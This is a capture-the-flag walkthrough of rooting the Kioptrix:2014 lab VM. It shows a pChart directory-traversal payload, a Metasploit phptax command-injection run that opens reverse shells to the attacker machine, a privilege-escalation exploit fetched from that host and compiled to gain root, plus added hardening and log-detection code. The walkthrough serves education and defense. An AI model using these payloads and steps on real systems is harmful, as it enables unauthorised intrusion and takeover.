Kioptrix:2014 – CTF

This is a walk through of how I gained root access to the Kioptrix:2014 image from Vulnhub.com.  This walk through is being provided for educational purposes only.  All testing on this image was performed in an isolated lab environment.  Understand that using the tools in this walk through against a host without permission is against the law.  Be smart folks.  Enjoy the walk through.

Full NMAP Scan:

root@kali:~# nmap -p- -A 192.168.1.231
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-06-29 18:39 CDT
Nmap scan report for 192.168.1.231
Host is up (0.0024s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden
MAC Address: 08:00:27:5F:87:38 (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Vonage V-Portal VoIP adapter (91%), Cisco Unified Communications Manager VoIP adapter (91%), DD-WRT v23 (Linux 2.4.36) (91%), Vyatta router (Linux 2.6.26) (91%), Linux 2.6.18 (91%), Linux 2.6.26 (PCLinuxOS) (91%), Netgear ReadyNAS Duo NAS device (RAIDiator 4.1.4) (91%), Sun OpenSolaris 2009.06 (91%), Zhone 6211-I3 series ADSL2+ modem (91%), Linux 2.6.18 - 2.6.22 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

Port 80 enumeration using curl.  The index page returns a meta refresh pointing to an application called pChart version 2.1.3 (output modified slightly to display properly):

root@kali:~# curl -i http://192.168.1.231
HTTP/1.1 200 OK
Date: Thu, 29 Jun 2017 14:34:17 GMT
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
Last-Modified: Sat, 29 Mar 2014 17:22:52 GMT
ETag: "105c6-98-4f5c211723300"
Accept-Ranges: bytes
Content-Length: 152
Content-Type: text/html
<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">

Local search of Exploit DB identified directory traversal and XSS vulnerabilities for the pChart application.  Link to exploit: https://www.exploit-db.com/exploits/31173/

root@kali:~# searchsploit pchart
--------------------------------------------------- ----------------------------------
 Exploit Title                                     |  Path
                                                   | (/usr/share/exploitdb/platforms)
--------------------------------------------------- ----------------------------------
 pChart 2.1.3 - Multiple Vulnerabilities           | ./php/webapps/31173.txt
--------------------------------------------------- ----------------------------------
root@kali:~# cat /usr/share/exploitdb/platforms/php/webapps/31173.txt
# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: http://www.pchart.net
# Software Link: http://www.pchart.net/download
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A
[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.
-----------------------
[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server’s privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server’s configuration.
This problem may exists in the production code if the example code was
copied into the production environment.
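
The advisory's point is that the examples viewer hands the user-supplied Script value straight to the filesystem. The following is an added example (written for this write-up, not pChart's own code) that models that defect in a simplified viewer and puts the hardened form beside it: the fixed version accepts only a bare file name and confirms, after resolving symlinks, that the target still sits inside the examples directory. The directory layout, file names and the "secret.txt" contents are constructed for the demonstration.

```python
import os
import tempfile
from urllib.parse import unquote

# Hypothetical, simplified model of the pChart examples viewer described in
# the advisory (added example, not pChart's source). The vulnerable version
# appends the decoded Script value to the examples directory unchecked, so a
# value such as "/../secret.txt" walks out of that directory.


def vulnerable_view(examples_dir, script):
    """Read the requested example the way the advisory describes: no checks."""
    path = examples_dir + "/" + unquote(script)
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def hardened_view(examples_dir, script):
    """Serve only a bare file name that resolves inside the examples directory."""
    base = os.path.realpath(examples_dir)
    name = unquote(script)
    # A single path component only: no separators and no "." or "..".
    if name in ("", ".", "..") or os.path.basename(name) != name:
        raise ValueError("invalid script name")
    target = os.path.realpath(os.path.join(base, name))
    # realpath follows symlinks, so a planted link out of the tree is caught too.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes examples directory")
    if not os.path.isfile(target):
        raise FileNotFoundError(name)
    with open(target, encoding="utf-8") as fh:
        return fh.read()


def build_lab():
    """Constructed layout: <tmp>/examples/example01.php and <tmp>/secret.txt."""
    root = tempfile.mkdtemp(prefix="pchart-lab-")
    examples = os.path.join(root, "examples")
    os.mkdir(examples)
    with open(os.path.join(examples, "example01.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php // harmless example ?>\n")
    with open(os.path.join(root, "secret.txt"), "w", encoding="utf-8") as fh:
        fh.write("db_password=placeholder\n")
    return examples


def demo():
    """Return (what the vulnerable viewer leaks, whether the hardened one
    rejected the same payload, what the hardened one returns for a valid name)."""
    examples = build_lab()
    # Same shape as the advisory's payload: an encoded slash followed by "..".
    payload = "%2f..%2fsecret.txt"
    leak = vulnerable_view(examples, payload)
    try:
        hardened_view(examples, payload)
        rejected = False
    except ValueError:
        rejected = True
    normal = hardened_view(examples, "example01.php")
    return leak, rejected, normal


if __name__ == "__main__":
    print(demo())
```

The basename check alone would already stop this payload; the realpath/commonpath comparison is the second layer that survives a stray symlink or a future change to how names are joined, which is why both are kept.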

Using the directory traversal to read httpd.conf turns up something interesting: a SetEnvIf rule keyed on the User-Agent, and a second VirtualHost on port 8080 with its own DocumentRoot. (A browser produces cleaner output; curl output is shown below, trimmed to the relevant lines):

root@kali:~# curl "http://192.168.1.231/pChart2.1.3/examples/index.php?Action=View&Script=../../../../../../../usr/local/etc/apache22/httpd.conf"
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
----
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

Enumerating port 8080 using Curl and the Mozilla 4.0 UA reveals the phptax application:

root@kali:~# curl -i -H "User-Agent: Mozilla/4.0" http://192.168.1.231:8080
HTTP/1.1 200 OK
Date: Thu, 29 Jun 2017 20:11:45 GMT
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
Content-Length: 201
Content-Type: text/html;charset=ISO-8859-1
----
<a href="phptax/"> phptax

Local search of Exploit DB reveals remote code execution vulnerabilities for the phptax application:

root@kali:~# searchsploit phptax
------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                     |  Path
                                                                   | (/usr/share/exploitdb/platforms)
------------------------------------------------------------------- ----------------------------------
 PhpTax - pfilez Parameter Exec Remote Code Injection              | ./php/webapps/21833.rb
 phptax 0.8 - Remote Code Execution                                | ./php/webapps/21665.txt
 PhpTax 0.8 - File Manipulation (newvalue) / Remote Code Execution | ./php/webapps/25849.txt

Used the following MSF module to take advantage of the vulnerability:  https://www.rapid7.com/db/modules/exploit/multi/http/phptax_exec
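
Both findings so far leave a clear trace in the Apache access log: the pChart traversal shows up as encoded ".." sequences in the Script parameter, and the phptax issue is a command injection through the pfilez query parameter. The following is an added example for this write-up (not part of the original post, and not from pChart, phptax or Metasploit) of detection logic run over a few constructed combined-format log lines. The phptax script name in the third line is assumed for illustration, as is every timestamp and byte count.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-log lines (not taken from the lab host). Line 1
# is a normal page fetch; line 2 carries the pChart traversal pattern from the
# advisory; line 3 carries a shell metacharacter in phptax's pfilez parameter.
LOG_LINES = [
    '192.168.1.234 - - [29/Jun/2017:14:34:17 -0500] "GET /pChart2.1.3/index.php HTTP/1.1" 200 152 "-" "curl/7.52.1"',
    '192.168.1.234 - - [29/Jun/2017:14:40:02 -0500] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf HTTP/1.1" 200 3189 "-" "curl/7.52.1"',
    '192.168.1.234 - - [29/Jun/2017:16:35:12 -0500] "GET /phptax/index.php?pfilez=report.tob;id HTTP/1.1" 200 64 "-" "Mozilla/4.0"',
]

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)
# A ".." path component, bounded by "/" or the string ends, after decoding.
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')
# Characters that let one shell command be chained onto another.
SHELL_META_RE = re.compile(r'[;|`]|\$\(')


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so a double-encoded payload is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def query_params(query):
    """Split a raw query string on '&' only; values are returned still encoded.

    Done by hand rather than with parse_qsl so that a ';' inside a value is
    kept as data on every Python version instead of being treated as a
    separator."""
    for chunk in query.split("&"):
        if not chunk:
            continue
        key, _, raw = chunk.partition("=")
        yield unquote(key), raw


def inspect_request(line):
    """Return the findings for one log line, or [] if nothing looks off."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed line"]
    parts = urlsplit(m.group("uri"))
    findings = []
    if TRAVERSAL_RE.search(decode_fully(parts.path)):
        findings.append("traversal:path")
    for key, raw in query_params(parts.query):
        value = decode_fully(raw)
        if TRAVERSAL_RE.search(value):
            findings.append(f"traversal:{key}")
        if SHELL_META_RE.search(value):
            findings.append(f"shell-metachar:{key}")
    return findings


def scan(lines):
    """Findings per line, in input order."""
    return [inspect_request(line) for line in lines]


if __name__ == "__main__":
    for line, findings in zip(LOG_LINES, scan(LOG_LINES)):
        print(findings, line.split('"')[1])
```

Decoding more than once matters here: a request that encodes the percent signs themselves ("%252e%252e%252f") decodes to "%2e%2e%2f" on the first pass and only becomes "../" on the second, which is exactly the kind of request a single-pass filter waves through.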

MSF Options:

msf exploit(phptax_exec) > options
----
Module options (exploit/multi/http/phptax_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.231    yes       The target address
   RPORT      8080             yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /phptax/         yes       The path to the web application
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   PhpTax 0.8

Running exploit and gaining low privilege shell:

msf exploit(phptax_exec) > run
----
[*] Started reverse TCP double handler on 192.168.1.234:443
[*] 192.168.1.231:8080 - Sending request...
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo r4zXySRDP8YiPQT7;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo lXbqAkCsNmmIvPWp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: "r4zXySRDP8YiPQT7\r\n"
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: "lXbqAkCsNmmIvPWp\r\n"
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.1.234:443 -> 192.168.1.231:38670) at 2017-06-29 16:35:12 -0500
[*] Command shell session 2 opened (192.168.1.234:443 -> 192.168.1.231:23736) at 2017-06-29 16:35:12 -0500
----
id
uid=80(www) gid=80(www) groups=80(www)

Enumerating the OS from the low-privilege shell shows that this host is running FreeBSD 9.  Searching for local privilege escalation vulnerabilities using the local Exploit DB copy:

root@kali:~# searchsploit freebsd 9. priv local
-------------------------------------------------------------- ----------------------------------
 Exploit Title                                                |  Path
                                                              | (/usr/share/exploitdb/platforms)
-------------------------------------------------------------- ----------------------------------
 Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation    | ./bsd/local/29.c
 FreeBSD 9.0 < 9.1 mmap/ptrace - Privilege Escalation         | ./freebsd/local/26368.c
 FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation       | ./freebsd/local/28718.c

Transferring exploit code using fetch:

pwd
/tmp
fetch -o /tmp/26368.c http://192.168.1.234/26368.c
/tmp/26368.c 2215 B 14 MBps

Compile and run exploit code:

gcc -o 26368 26368.c
chmod 755 26368
./26368
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)

Congrats.txt file:

pwd
/root
cat congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way…
